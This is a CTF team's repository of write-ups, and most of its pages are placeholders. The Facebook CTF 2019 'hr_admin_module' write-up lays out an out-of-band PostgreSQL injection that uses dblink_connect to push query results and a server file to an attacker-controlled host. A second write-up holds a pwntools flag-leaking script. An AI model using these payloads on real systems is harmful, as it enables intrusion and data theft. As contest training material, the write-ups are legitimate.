├── LICENSE ├── README.md ├── fbctf2019 ├── README.md ├── events │ └── README.md ├── hr-admin-module │ ├── README.md │ ├── dblink-connect.png │ ├── no-warning.png │ ├── screenshot.png │ ├── user-search.png │ └── warning.png ├── pdfme │ └── README.md ├── products-manager │ └── README.md ├── rceservice │ ├── README.md │ └── rceservice.tar.gz └── secret-note-keeper │ └── README.md ├── hacklu2018 ├── 1-bit-missile │ ├── 1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip │ └── README.md ├── README.md ├── baby-exploit │ ├── README.md │ └── babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip ├── baby-kernel │ ├── README.md │ └── baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip ├── baby-php │ ├── README.md │ └── trap.png ├── baby-reverse │ ├── README.md │ └── babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip ├── cheat-console │ ├── CheatConsole_4648d68145298cca67d3a6b97d6dbe50.zip │ └── README.md ├── forgetful-commander │ ├── ForgetfulCommander_85dcf6730d6936301904fc2218c77d6c.zip │ └── README.md ├── heap-heaven-2 │ └── README.md └── relations │ └── README.md ├── hitcon2018 ├── README.md ├── baby-cake │ ├── README.md │ ├── baby_cake.tgz │ └── screenshot.png ├── ev3-basic │ ├── README.md │ └── ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz └── ev3-scanner │ ├── README.md │ ├── ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz │ ├── flag.png │ └── flag │ ├── line1.txt │ ├── line10.txt │ ├── line11.txt │ ├── line12.txt │ ├── line2.txt │ ├── line3.txt │ ├── line4.txt │ ├── line5.txt │ ├── line6.txt │ ├── line7.txt │ ├── line8.txt │ ├── line9.txt │ └── solve.py └── seccon2018 ├── GhostKingdom └── README.md ├── README.md ├── block ├── README.md ├── block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf └── block.png ├── boguscrypt ├── Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae └── README.md ├── classic-pwn ├── README.md ├── classic_aa9e979fd5c597526ef30c003bffee474b314e22 └── libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253 ├── history ├── J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba └── README.md ├── kindvm ├── README.md └── kindvm_79726158fec11eb1e5a89351db017e13506d3a4a ├── mnemonic ├── README.md └── mnemonic.txt ├── profile ├── README.md ├── libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253 └── profile_e814c1a78e80ed250c17e94585224b3f3be9d383 ├── qr-checker ├── README.md └── qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b ├── runme ├── README.md └── runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68 ├── shooter ├── README.md ├── shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72 ├── shooter_error.png ├── shooter_login.png ├── shooter_scores.png └── solve_shooter.py ├── special-device-file ├── README.md └── runme_8a10b7425cea81a043db0fd352c82a370a2d3373 ├── special-instructions ├── README.md ├── disas_moxie.py └── runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be ├── tctktoy ├── README.md └── file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9 └── unzip ├── README.md └── unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 PDKT 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF Write-Ups by PDKT 2 | 3 | Write-ups for various CTF challenges by [PDKT team](https://ctftime.org/team/16919) with English and Indonesian language. 4 | 5 | ## 2019 6 | 7 | * [**Facebook CTF 2019**](fbctf2019) 8 | 9 | ## 2018 10 | 11 | * [**Hack.lu CTF 2018**](hacklu2018) 12 | * [**HITCON CTF 2018 Online Quals**](hitcon2018) 13 | * [**SECCON CTF 2018 Online Quals**](seccon2018) -------------------------------------------------------------------------------- /fbctf2019/README.md: -------------------------------------------------------------------------------- 1 | # Facebook CTF 2019 2 | 3 | https://ctftime.org/event/781 4 | 5 | ## Web 6 | - [products manager (100)](products-manager) 7 | - [pdfme (655)](pdfme) 8 | - [secret note keeper (676)](secret-note-keeper) 9 | - [rceservice (919)](rceservice) 10 | - [events (957)](events) 11 | - [hr_admin_module (1000)](hr-admin-module) -------------------------------------------------------------------------------- /fbctf2019/events/README.md: -------------------------------------------------------------------------------- 1 | # events 2 | --- 3 | **Points:** 957 | **Solves:** 23/1734 | **Category:** Web 4 | 5 | I heard cookies and string formatting are safe in 2019? 6 | 7 | http://challenges.fbctf.com:8083 8 | 9 | (This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning). 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | TODO 17 | 18 | 19 | ## Bahasa Indonesia 20 | TODO 21 | -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/README.md: -------------------------------------------------------------------------------- 1 | # hr_admin_module 2 | --- 3 | **Points:** 1000 | **Solves:** 4/1734 | **Category:** Web 4 | 5 | While tying down the application the developer may have had trouble revoking the permission on one or two functions. Let's hope this got sorted. At least he made sure the site feels really fast. 6 | 7 | http://challenges.fbctf.com:8081 8 | 9 | ![](screenshot.png) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | *Solved after the CTF ended.* 17 | 18 | ### Summary 19 | - We can trigger PostgreSQL Injection by using hidden `user_search` parameter. 20 | - Query execution occurs in the background or asynchronously (probably with `dblink`) so the website only displays a warning message when there is a syntax or semantic error in the query. 21 | - We can't perform In-Band SQL Injection or Inferential (Blind) SQL Injection because everything is run in the background (we can only know if the syntax and semantic are correct or not). 22 | - Out-of-Band SQL Injection can be performed by using SQL SSRF via `dblink_connect` to establish a connection to our remote server so we can get the query result through DNS request or raw network dump (`(SELECT dblink_connect('host=HOST user=' || (QUERY) || ' password=PASSWORD dbname=DBNAME'))`). 23 | - The current PostgreSQL user is allowed to use `lo_import` to load a file into `pg_largeobject` catalog but doesn't have permission to perform `SELECT` on `pg_largeobject` nor using `lo_get` for new object's `oid`. 24 | - We can get the list of all `oid` through `pg_largeobject_metadata` and then try to use `lo_get` for old `oid` to see if secret/flag file has been loaded before and the current user is allowed to load it. 25 | - The flag file has been loaded in the past with `oid` 16444 so we can get its content by using `lo_get(16444)`! 26 | 27 | ### Detailed Steps 28 | 29 | This website has a simple dashboard with a feature to search employees (`?employee_search=`). From the error message, we can know there is a file named `secret` in `/var/lib/postgresql/data/`. We can assume if that file is the flag file and this website uses PostgreSQL. There is one feature to search users but it seems to be disabled on the front-end. We can still access the feature by requesting to its parameter. By looking in the source code, we can know that the parameter name is `user_search`. 30 | 31 | ![](user-search.png) 32 | 33 | The use of this feature has produced nothing. There are no results or anything on the website. However, if the search value contains a single quote and we refresh the page again, the website will display a warning message. It seems that it uses session-based warning messages and delays to prevent automatic scanners. 34 | 35 | ![](warning.png) 36 | 37 | Closing the value with SQL comment will not produce a warning. Again, we might need to refresh the page. 38 | 39 | ![](no-warning.png) 40 | 41 | We can try a number of PostgreSQL queries to find out which query that will generate a warning message and not. To be sure, we can refresh the page multiple times for each query. 42 | 43 | - `asd' and 1=0 --`, no warning 44 | - `asd' and 1=1 --`, no warning 45 | - `asd' order by 1 --`, no warning 46 | - `asd' order by 2 --`, no warning 47 | - `asd' order by 3 --`, warning 48 | - `asd' union select 1,2 --`, warning 49 | - `asd' union select 1,'a' --`, no warning 50 | - `asd' union select 1,pg_sleep(10) --`, warning 51 | - `asd' union select 1,cast(pg_sleep(10) as text) --`, no warning (without any delay) 52 | - `asd' union select 1,'a' from pg_database --`, no warning 53 | - `asd' union select 1,'a' from farisv --`, warning 54 | - `asd' union select 1,chr(65) --`, no warning 55 | - `asd' union select 1,chr(-65) --`, no warning 56 | 57 | From obeserved behaviors, we can assume if the warning message only appears when there is a syntax or semantic error in the query. Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously. In this case, we can't use common SQL Injection tricks like In-Band SQL Injection or Inferential/Blind SQL Injection. 58 | 59 | Quick googling about running PostgreSQL query asynchronously yield an information about `dblink` (https://www.postgresql.org/docs/11/dblink.html). It's a module that supports connections to other PostgreSQL databases (or to the same database) from within a database session. It provides `dblink_send_query` to sends a query to be executed asynchronously. This module is not enabled by default but it is possible this module is enabled in this case. 60 | 61 | We can see that the query containing `dblink_connect` doesn't cause a warning so `dblink` may be enabled. 62 | 63 | ![](dblink-connect.png) 64 | 65 | Normally, `dblink_connect` can be used to open a persistent connection to a remote PostgreSQL database (e.g. `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`). Because we can control the parameter of this function, we can perform SQL Server Side Request Forgery to our own host. That means, we can perform Out-of-Band SQL Injection to exfiltrate data from SQL query results. At least, there are two ways to do this: 66 | 67 | 1. Set up a DNS server and then trigger the connection to `[data].our.domain` so that we can see the data in the log or in the DNS network packets. 68 | 2. Set up a public PostgreSQL server, monitor the incoming netowrk packets to PostgreSQL port, and then trigger a connection to our host with exfiltrated data as `user`/`dbname`. By default, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as a plaintext on the network. 69 | 70 | The second method is easier because we don't need any domain. We only need to set up a server with a public IP, install PostgreSQL, set the PostgreSQL service to listen to \*/0.0.0.0, and run a network dumper (e.g. tcpdump) to monitor traffic to the PostgreSQL port (5432 by default). 71 | 72 | To set PostgreSQL so that it will listen to the public, set `listen_addresses` in `postgresql.conf` to `*`. 73 | 74 | ``` 75 | listen_addresses = '*' 76 | ``` 77 | 78 | To monitor incoming traffic, run `tcpdump` to monitor port 5432. 79 | 80 | ``` 81 | sudo tcpdump -nX -i eth0 port 5432 82 | ``` 83 | 84 | To see if we get a connection from the target, we can try using this query: 85 | 86 | ``` 87 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) -- 88 | ``` 89 | 90 | If successful, we get a piece of network packet with readable `user` and `dbname`. 91 | 92 | ``` 93 | 17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42 94 | 0x0000: 4500 005e 9417 4000 2706 248c 36b9 a3fe E..^..@.'.$.6... 95 | 0x0010: 9de6 2259 c718 2061 5889 142a 9f8a cb5d .."Y...aX..*...] 96 | 0x0020: 8018 00e5 1701 0000 0101 080a 39d2 393d ............9.9= 97 | 0x0030: 3924 7ef6 0000 002a 0003 0000 7573 6572 9$~....*....user 98 | 0x0040: 0066 6172 6973 7600 6461 7461 6261 7365 .farisv.database 99 | 0x0050: 0068 656c 6c6f 6672 6f6d 6662 0000 .hellofromfb. 100 | ``` 101 | 102 | Then, we can continue to extract the database using several PostgreSQL queries. Note that for each query result that contains whitespaces, we need to convert the result to hex/base64 with `encode` function or replace the whitespace to other character with `replace` function because it will cause an execution error during `dblink_connect` process. 103 | 104 | Get a list of schemas: 105 | 106 | ``` 107 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) -- 108 | ``` 109 | 110 | ``` 111 | 17:36:46.538178 IP 54.185.163.254.51018 > [REDACTED]: Flags [P.], seq 1:70, ack 1, win 229, options [nop,nop,TS val 971433789 ecr 960048322], length 69 112 | 0x0000: 4500 0079 ecd5 4000 2706 cbb2 36b9 a3fe E..y..@.'...6... 113 | 0x0010: 9de6 2259 c74a 2061 1e74 4769 b404 803d .."Y.J.a.tGi...= 114 | 0x0020: 8018 00e5 2710 0000 0101 080a 39e6 e73d ....'.......9..= 115 | 0x0030: 3939 2cc2 0000 0045 0003 0000 7573 6572 99,....E....user 116 | 0x0040: 0070 7562 6c69 633a 696e 666f 726d 6174 .public:informat 117 | 0x0050: 696f 6e5f 7363 6865 6d61 3a70 675f 6361 ion_schema:pg_ca 118 | 0x0060: 7461 6c6f 6700 6461 7461 6261 7365 0070 talog.database.p 119 | 0x0070: 6f73 7467 7265 7300 00 ostgres. 120 | ``` 121 | 122 | Get a list of tables in current schema: 123 | 124 | ``` 125 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) -- 126 | ``` 127 | 128 | ``` 129 | 17:38:30.515438 IP 54.185.163.254.51026 > [REDACTED]: Flags [P.], seq 1:42, ack 1, win 229, options [nop,nop,TS val 971537775 ecr 960152304], length 41 130 | 0x0000: 4500 005d f371 4000 2706 c532 36b9 a3fe E..].q@.'..26... 131 | 0x0010: 9de6 2259 c752 2061 8dd4 e226 24a3 a5c5 .."Y.R.a...&$... 132 | 0x0020: 8018 00e5 fe2b 0000 0101 080a 39e8 7d6f .....+......9.}o 133 | 0x0030: 393a c2f0 0000 0029 0003 0000 7573 6572 9:.....)....user 134 | 0x0040: 0073 6561 7263 6865 7300 6461 7461 6261 .searches.databa 135 | 0x0050: 7365 0070 6f73 7467 7265 7300 00 se.postgres. 136 | ``` 137 | 138 | Count the rows in `searches` table. 139 | 140 | ``` 141 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) -- 142 | ``` 143 | 144 | ``` 145 | 17:42:39.511643 IP 54.185.163.254.51034 > [REDACTED]: Flags [P.], seq 1:35, ack 1, win 229, options [nop,nop,TS val 971786760 ecr 960401280], length 34 146 | 0x0000: 4500 0056 7982 4000 2706 3f29 36b9 a3fe E..Vy.@.'.?)6... 147 | 0x0010: 9de6 2259 c75a 2061 5ec0 7df0 8611 357d .."Y.Z.a^.}...5} 148 | 0x0020: 8018 00e5 f855 0000 0101 080a 39ec 4a08 .....U......9.J. 149 | 0x0030: 393e 8f80 0000 0022 0003 0000 7573 6572 9>....."....user 150 | 0x0040: 0030 0064 6174 6162 6173 6500 706f 7374 .0.database.post 151 | 0x0050: 6772 6573 0000 gres. 152 | ``` 153 | 154 | It looks like it only has one empty table in the current schema and the flag is not in the database. We may really need to exfiltrate data from `/var/lib/postgresql/data/secret`. Unfortunately, if we try to use `pg_read_file` or `pg_read_binary_file` to read the file, we will not get an incoming connection so that the current user may not have permission to use these functions. 155 | 156 | The alternative to reading files is to use large objects (https://www.postgresql.org/docs/11/lo-funcs.html). We can use `lo_import` to load the contents of the file into the `pg_largeobject` catalog. If the query is success, we will get the object's `oid`. 157 | 158 | ``` 159 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) -- 160 | ``` 161 | 162 | ``` 163 | 17:54:51.963925 IP 54.185.163.254.51046 > [REDACTED]: Flags [P.], seq 1:39, ack 1, win 229, options [nop,nop,TS val 972519214 ecr 961133706], length 38 164 | 0x0000: 4500 005a 071f 4000 2706 b188 36b9 a3fe E..Z..@.'...6... 165 | 0x0010: 9de6 2259 c766 2061 26fb c8a7 bbb3 fe01 .."Y.f.a&....... 166 | 0x0020: 8018 00e5 2272 0000 0101 080a 39f7 772e ...."r......9.w. 167 | 0x0030: 3949 bc8a 0000 0026 0003 0000 7573 6572 9I.....&....user 168 | 0x0040: 0032 3436 3638 0064 6174 6162 6173 6500 .24668.database. 169 | 0x0050: 706f 7374 6772 6573 0000 postgres.. 170 | ``` 171 | 172 | We got 24668 as `oid` so that means we can use `lo_import` function. Unfortunately, we won't get any results if we try to get the content of large object using `lo_get(24668)` or directly access the `pg_largeobject` catalog. It looks like the current user doesn't have permission to read the content of new objects. 173 | 174 | After reading the documentation of large objects in PostgreSQL, we can find out that large objects can has ACL (Access Control List). That means, if there is an old object with an ACL that allows current user to read it, then we can exfiltrate that object's content. 175 | 176 | We can get a list of available large object's `oid` by extracting from `pg_largeobject_metadata`. 177 | 178 | ``` 179 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) -- 180 | ``` 181 | 182 | ``` 183 | 18:06:57.172285 IP 54.185.163.254.51052 > [REDACTED]: Flags [.], seq 1:2897, ack 1, win 229, options [nop,nop,TS val 973244413 ecr 961858878], length 2896 184 | 0x0000: 4500 0b84 7adf 4000 2606 339e 36b9 a3fe E...z.@.&.3.6... 185 | 0x0010: 9de6 2259 c76c 2061 8d76 e934 10c9 3972 .."Y.l.a.v.4..9r 186 | 0x0020: 8010 00e5 a66d 0000 0101 080a 3a02 87fd .....m......:... 187 | 0x0030: 3954 cd3e 0000 1c94 0003 0000 7573 6572 9T.>........user 188 | 0x0040: 0031 3635 3731 3a31 3634 3339 3a31 3635 .16571:16439:165 189 | 0x0050: 3732 3a31 3634 3431 3a31 3634 3432 3a31 72:16441:16442:1 190 | 0x0060: 3733 3732 3a31 3634 3434 3a31 3634 3435 7372:16444:16445 191 | 0x0070: 3a31 3831 3534 3a31 3733 3830 3a31 3737 :18154:17380:177 192 | 0x0080: 3038 3a31 3635 3737 3a31 3634 3530 3a31 08:16577:16450:1 193 | 0x0090: 3634 3531 3a31 3634 3532 3a31 3634 3533 6451:16452:16453 194 | 195 | ..... 196 | ..... 197 | ..... 198 | ``` 199 | 200 | We got a bunch of `oid`s. We can try using `lo_get` to load object's content. For example, `lo_get(16439)` will load the content of `/etc/passwd`. Because the result of `lo_gets` is `bytea`, we need to convert it to `UTF8` so that it can be appended in the query. 201 | 202 | We can try to load some objects with lowest `oid` to find out if the flag file has been loaded before. The flag file object does exist with `oid` 16444. There are no whitespaces in the flag so we can just display it as is. 203 | 204 | To load the flag: 205 | 206 | ``` 207 | asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=postgres')) -- 208 | ``` 209 | 210 | ``` 211 | 18:13:01.953251 IP 54.185.163.254.51058 > [REDACTED]: Flags [P.], seq 1:65, ack 1, win 229, options [nop,nop,TS val 973609199 ecr 962223650], length 64 212 | 0x0000: 4500 0074 bc7d 4000 2706 fc0f 36b9 a3fe E..t.}@.'...6... 213 | 0x0010: 9de6 2259 c772 2061 0b27 4451 16b1 7f33 .."Y.r.a.'DQ...3 214 | 0x0020: 8018 00e5 92bb 0000 0101 080a 3a08 18ef ............:... 215 | 0x0030: 395a 5e22 0000 0040 0003 0000 7573 6572 9Z^"...@....user 216 | 0x0040: 0066 627b 4040 646e 735f 3378 6669 6c5f .fb{@@dns_3xfil_ 217 | 0x0050: 6630 725f 7468 655f 7731 6e21 2140 407d f0r_the_w1n!!@@} 218 | 0x0060: 0064 6174 6162 6173 6500 706f 7374 6772 .database.postgr 219 | 0x0070: 6573 0000 es.. 220 | ``` 221 | 222 | Flag: **fb{@@dns_3xfil_f0r_the_w1n!!@@}** 223 | 224 | A nice challenge to learn Out-of-Band SQL Injection and PostgreSQL! Because the flag mentions `dns`, maybe the way to exfiltrate data through PostgreSQL network communication is not the intended solution. 225 | 226 | ## Bahasa Indonesia 227 | TODO 228 | -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/dblink-connect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/dblink-connect.png -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/no-warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/no-warning.png -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/screenshot.png -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/user-search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/user-search.png -------------------------------------------------------------------------------- /fbctf2019/hr-admin-module/warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/warning.png -------------------------------------------------------------------------------- /fbctf2019/pdfme/README.md: -------------------------------------------------------------------------------- 1 | # pdfme 2 | --- 3 | **Points:** 655 | **Solves:** 63/1734 | **Category:** Web 4 | 5 | We setup this PDF conversion service for public use, hopefully it's safe. 6 | 7 | http://challenges.fbctf.com:8084 8 | 9 | (This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning). 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | TODO 17 | 18 | 19 | ## Bahasa Indonesia 20 | TODO 21 | -------------------------------------------------------------------------------- /fbctf2019/products-manager/README.md: -------------------------------------------------------------------------------- 1 | # products manager 2 | --- 3 | **Points:** 655 | **Solves:** 431/1734 | **Category:** Web 4 | 5 | Come play with our products manager application! 6 | 7 | http://challenges.fbctf.com:8087 8 | 9 | Written by Vampire 10 | 11 | (This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning). 12 | 13 | --- 14 | 15 | [Bahasa Indonesia](#bahasa-indonesia) 16 | 17 | ## English 18 | TODO 19 | 20 | 21 | ## Bahasa Indonesia 22 | TODO 23 | -------------------------------------------------------------------------------- /fbctf2019/rceservice/README.md: -------------------------------------------------------------------------------- 1 | # rceservice 2 | --- 3 | **Points:** 919 | **Solves:** 31/1734 | **Category:** Web 4 | 5 | We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls' 6 | 7 | http://challenges.fbctf.com:8085 8 | 9 | (This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning). 10 | 11 | [Download](rceservice.tar.gz) 12 | 13 | --- 14 | 15 | [Bahasa Indonesia](#bahasa-indonesia) 16 | 17 | ## English 18 | TODO 19 | 20 | 21 | ## Bahasa Indonesia 22 | TODO 23 | -------------------------------------------------------------------------------- /fbctf2019/rceservice/rceservice.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/rceservice/rceservice.tar.gz -------------------------------------------------------------------------------- /fbctf2019/secret-note-keeper/README.md: -------------------------------------------------------------------------------- 1 | # secret note keeper 2 | --- 3 | **Points:** 676 | **Solves:** 61/1734 | **Category:** Web 4 | 5 | Find the secret note that contains the fl4g! 6 | 7 | http://challenges.fbctf.com:8082 8 | 9 | Same thing but in tokyo: http://challenges3.fbctf.com:8082/ 10 | 11 | (Timeout is 5 seconds for links, flag is case insensitive) 12 | 13 | --- 14 | 15 | [Bahasa Indonesia](#bahasa-indonesia) 16 | 17 | ## English 18 | TODO 19 | 20 | 21 | ## Bahasa Indonesia 22 | TODO 23 | -------------------------------------------------------------------------------- /hacklu2018/1-bit-missile/1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/1-bit-missile/1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip -------------------------------------------------------------------------------- /hacklu2018/1-bit-missile/README.md: -------------------------------------------------------------------------------- 1 | # 1-bit-missile 2 | --- 3 | **Points:** 271 | **Solves:** 39/1035 | **Category:** Reverse 4 | 5 | The laser cannon is aiming in the wrong direction. 6 | 7 | Maybe a precise shot can calibrate it. 8 | 9 | `nc arcade.fluxfingers.net 1816` 10 | 11 | [Download](1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip) 12 | --- 13 | 14 | [Bahasa Indonesia](#bahasa-indonesia) 15 | 16 | ## English 17 | The binary provided is a dumped ROM that can be run with `qemu`. 18 | 19 | 20 | ``` 21 | qemu-system-i386 -bios rom -serial stdio 22 | ``` 23 | 24 | In binary there is also a flag string at offset 143075. 25 | 26 | ``` 27 | $ strings -a -t d rom | grep flag 28 | 143075 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} 29 | 148568 %s%s resource base %llx size %llx align %d gran %d limit %llx flags %lx index %lx 30 | 152945 Code: %d eflags: %08x cr2: %08x 31 | ``` 32 | 33 | Service at 'arcade.fluxfingers.net: 1816' run the similar program with different flag. We can convert 1 bit from ROM to 0 at any offset. Before changing the bit, the service also displays bytes at the selected offset. 34 | 35 | 36 | ``` 37 | Enter target byte [0 - 262143]: 140000 38 | ]> 01001101 <[ 39 | Enter target bit: [0 - 7]: 0 40 | }X> ---------------------------------------{0} 41 | ]> 01001100 <[ 42 | 43 | 44 | coreboot-4.8-1707-g33cd6d5-dirty Sun Oct 14 23:58:10 UTC 2018 ramstage starting... 45 | ... 46 | Jumping to boot code at 00100000(00fd7000) 47 | FLAG if hit confirmed: 48 | MISSED! 49 | ``` 50 | 51 | By using the bytes leak, we can leak the flag string at offset 143075. 52 | 53 | The following is the script used. 54 | 55 | ```python 56 | 57 | from pwn import * 58 | 59 | now = '' 60 | flag_offset = 143075 61 | flag = '' 62 | 63 | while (now != '}'): 64 | r = remote('arcade.fluxfingers.net', 1816) 65 | r.recvuntil(': ') 66 | r.sendline(str(flag_offset)) 67 | leak = r.recvline()[3:-4] 68 | now = chr(int(leak, 2)) 69 | flag += now 70 | flag_offset += 1 71 | 72 | print flag 73 | ``` 74 | 75 | Flag: **flag{only_cb_can_run_this_simple_elf}** 76 | 77 | 78 | ## Bahasa Indonesia 79 | Binary yang diberikan adalah sebuah ROM dump yang dapat dijalankan dengan `qemu`. 80 | 81 | ``` 82 | qemu-system-i386 -bios rom -serial stdio 83 | ``` 84 | 85 | Pada binary juga terdapat flag pada offset 143075 86 | 87 | ``` 88 | $ strings -a -t d rom | grep flag 89 | 143075 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} 90 | 148568 %s%s resource base %llx size %llx align %d gran %d limit %llx flags %lx index %lx 91 | 152945 Code: %d eflags: %08x cr2: %08x 92 | ``` 93 | 94 | Layanan pada `arcade.fluxfingers.net:1816` menjalankan program yang sepertinya flagnya sudah diubah. Kita dapat mengubah 1 bit dari ROM menjadi 0 pada offset manapun. Sebelum diubah, layanan juga menampilkan byte pada offset yang dipilih. 95 | 96 | ``` 97 | Enter target byte [0 - 262143]: 140000 98 | ]> 01001101 <[ 99 | Enter target bit: [0 - 7]: 0 100 | }X> ---------------------------------------{0} 101 | ]> 01001100 <[ 102 | 103 | 104 | coreboot-4.8-1707-g33cd6d5-dirty Sun Oct 14 23:58:10 UTC 2018 ramstage starting... 105 | ... 106 | Jumping to boot code at 00100000(00fd7000) 107 | FLAG if hit confirmed: 108 | MISSED! 109 | ``` 110 | 111 | Dengan memanfaatkan leak pada bytes, kita dapat melakukan leak pada string flag yang ada di offset 143075. 112 | 113 | Berikut adalah script yang digunakan. 114 | 115 | ```python 116 | 117 | from pwn import * 118 | 119 | now = '' 120 | flag_offset = 143075 121 | flag = '' 122 | 123 | while (now != '}'): 124 | r = remote('arcade.fluxfingers.net', 1816) 125 | r.recvuntil(': ') 126 | r.sendline(str(flag_offset)) 127 | leak = r.recvline()[3:-4] 128 | now = chr(int(leak, 2)) 129 | flag += now 130 | flag_offset += 1 131 | 132 | print flag 133 | ``` 134 | 135 | Flag: **flag{only_cb_can_run_this_simple_elf}** 136 | -------------------------------------------------------------------------------- /hacklu2018/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2018 2 | 3 | https://ctftime.org/event/699 4 | 5 | ## Crypto 6 | - [Relations (205)](relations) 7 | 8 | ## Pwn 9 | - [Baby Exploit (186)](baby-exploit) 10 | - [Baby Kernel (189)](baby-kernel) 11 | - [Heap Heaven 2 (246)](heap-heaven-2) 12 | 13 | ## Reverse 14 | - [1-bit-missile (271)](1-bit-missile) 15 | - [Baby Reverse (108)](baby-reverse) 16 | - [Cheat Console (329)](cheat-console) 17 | - [Forgetful Commander (281)](forgetful-commander) 18 | 19 | ## Web 20 | - [Baby PHP (153)](baby-php) 21 | -------------------------------------------------------------------------------- /hacklu2018/baby-exploit/README.md: -------------------------------------------------------------------------------- 1 | # Baby Exploit 2 | --- 3 | **Points:** 186 | **Solves:** 97/1035 | **Category:** Pwn 4 | 5 | This Challenge is the continuation of babyreversing. If you just reversed the file, go ahead 